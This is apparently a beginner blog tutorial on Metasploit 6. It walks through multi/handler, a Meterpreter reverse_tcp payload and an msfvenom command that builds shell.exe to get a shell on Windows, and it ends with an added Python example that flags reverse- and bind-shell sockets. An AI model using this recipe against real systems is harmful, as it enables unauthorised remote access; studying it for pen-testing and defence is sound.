Metasploit Basics For Hackers: Getting Started with Metasploit 6

cyberwarehack
4 min read · May 17, 2021


Hey, hello everyone, and welcome to my first blog. I think you will love it.

Introduction

Metasploit

A standardized framework used by security researchers and pen-testers, consisting of shellcodes in various programming and scripting languages. It is an open-source framework first developed by H. D. Moore in 2003. A paid version of Metasploit is also available and is used by professional pen-testers.

Metasploit is further divided into modules such as:

  • Payloads
  • Exploits
  • Encoders
  • Auxiliary
  • Nops
  • Post
  • Evasion

Some basic keywords you need to know before getting into it:

Payload:- A piece of code that gives you access to the victim's computer; it needs to be installed and run on the target's computer.

Encoder:- A type of encoding applied to your payload to reduce detection of the payload file.

Exploit:- An exploit executes a sequence of commands that targets a specific vulnerability on the target's machine.

Reverse shell:- A reverse shell is a type of shell that connects back to your machine when the payload file is executed on the victim's computer.

Bind shell:- This shell is the opposite of the reverse shell. Here the attacker connects to the victim's computer, which listens for the connection once the payload is executed.

Metasploit basic commands you need to know:

  • msfconsole “To start Metasploit”
  • msfvenom “To create your payload file”
  • help “Lists all commands”
  • use “To select a payload, encoder, or exploit”
  • set “Used to set LHOST and LPORT”
  • show options or options “Used to show the options of the selected module or payload”

Now you know all the basic commands and basic keywords of Metasploit.

Let’s dive more into it.

Now there are many versions of Metasploit; the latest is version 6.

Version 6 of Metasploit includes:

  • End-to-end encryption of the Meterpreter shell.
  • Improved SMB service support, covering SMB versions 1, 2 and 3.

These were the basic updates; for more, see https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/

Metasploit is a huge framework consisting of over 592 payloads and 2074 exploits. Isn’t that huge? It’s a great way to learn by trying things and running them yourself (DIY).

Now I will introduce some of the basic Windows exploits present in Metasploit, and show how to get a reverse shell from the payload file.

Now fire up your Kali machine and let’s get started. Type “msfconsole” to start the Metasploit framework.

Let’s use an exploit known as

multi/handler

Now type into your Metasploit console “use multi/handler”.

Now the exploit will be selected. With our exploit selected, let’s set our payload. There are many types of payloads; the one we are going to use is “windows/meterpreter/reverse_tcp”.

To use this payload, type “set payload windows/meterpreter/reverse_tcp”. Now the payload will be set.

Now we have to set our LHOST and LPORT. Type into your Metasploit console “set LHOST {your ip}”. Now that you have set your LHOST, let’s set the LPORT with “set LPORT {any port here}”.

If you want to cross-check your IP address, port number, or payload, just type “options” in Metasploit.

Now that we have set our LHOST, LPORT, and payload, let’s make the payload file that is going to be executed on the target's computer, using msfvenom.

Msfvenom is a small tool used to create payloads for the target's computer.

To use it, open a new tab in your terminal and just type msfvenom. It will list all the options it accepts. Some of the commonly used ones are:

  • -p for the payload
  • -a for the architecture (arch)
  • -o for the output file
  • -e for the encoder
  • -f for the format of the output file

So let’s make a payload for Windows. The command will look like:

“msfvenom -p {your payload here} LHOST={ip} LPORT={your port} -o filename”

Don’t worry about those errors; that is just how the output looks.

Now we have created our payload, “shell.exe”.

Next, go to your Metasploit tab and type “run”. This will start a listener and show a message like:

started reverse tcp handler on 192.168.0.1:4444

Now go to your Windows machine and just execute the shell.exe file, and boom, you just hacked Windows.
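To see what the reverse shell and bind shell definitions from earlier mean on the victim's side, here is an added defender's example (not code from the original post or from Metasploit). A reverse shell such as the reverse_tcp payload above shows up on the victim as an outbound connection to the attacker's listener (the handler in this post listens on 192.168.0.1:4444), while a bind shell shows up as an unexpected listening port on the victim. The connection records, the allow-lists of "expected" ports, and the process names are all constructed assumptions for the demonstration:

```python
# Added example (not from the original post): classify a host's sockets
# by whether they match the reverse-shell or bind-shell pattern.
# All connection records below are constructed, and the port allow-lists
# are assumptions chosen for this demonstration.
from dataclasses import dataclass

# Assumption: ports this host is expected to listen on.
EXPECTED_LISTEN_PORTS = {135, 139, 445, 3389}
# Assumption: outbound destination ports considered ordinary for a workstation.
COMMON_OUTBOUND_PORTS = {53, 80, 443}


@dataclass
class Conn:
    direction: str   # "outbound" (host initiated) or "listening"
    process: str     # image name that owns the socket
    local: str       # "ip:port"
    remote: str      # "ip:port", or "*:*" for a listener


def port_of(endpoint: str) -> int:
    """Extract the port from an 'ip:port' string."""
    return int(endpoint.rsplit(":", 1)[1])


def classify(conn: Conn) -> str:
    """Label a connection 'reverse', 'bind' or 'normal'.

    reverse: the host itself connected out to a port that is not in the
             ordinary allow-list (the reverse_tcp callback pattern).
    bind:    the host is listening on a port it is not expected to serve
             (the bind-shell pattern, where the attacker connects in).
    """
    if conn.direction == "outbound":
        if port_of(conn.remote) not in COMMON_OUTBOUND_PORTS:
            return "reverse"
        return "normal"
    if conn.direction == "listening":
        if port_of(conn.local) not in EXPECTED_LISTEN_PORTS:
            return "bind"
        return "normal"
    return "normal"


# Constructed snapshot of a Windows host's sockets (not real data).
SAMPLE_CONNS = [
    Conn("outbound", "chrome.exe", "192.168.0.20:51002", "142.250.0.1:443"),
    Conn("outbound", "shell.exe", "192.168.0.20:51003", "192.168.0.1:4444"),
    Conn("listening", "System", "0.0.0.0:445", "*:*"),
    Conn("listening", "shell.exe", "0.0.0.0:4444", "*:*"),
]


def triage(conns):
    """Return the suspicious connections grouped by shell type."""
    findings = {"reverse": [], "bind": []}
    for c in conns:
        label = classify(c)
        if label != "normal":
            findings[label].append(c)
    return findings


if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_CONNS).items():
        for c in hits:
            print(f"{kind:7s} {c.process:12s} local={c.local} remote={c.remote}")
```

Running the block flags the shell.exe outbound connection to 192.168.0.1:4444 as the reverse pattern and the shell.exe listener on 4444 as the bind pattern, while the browser and SMB sockets pass. Port lists alone are a weak signal, since the handler port is chosen freely by whoever runs multi/handler; in practice this check is combined with which process owns the socket and how that process was started.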
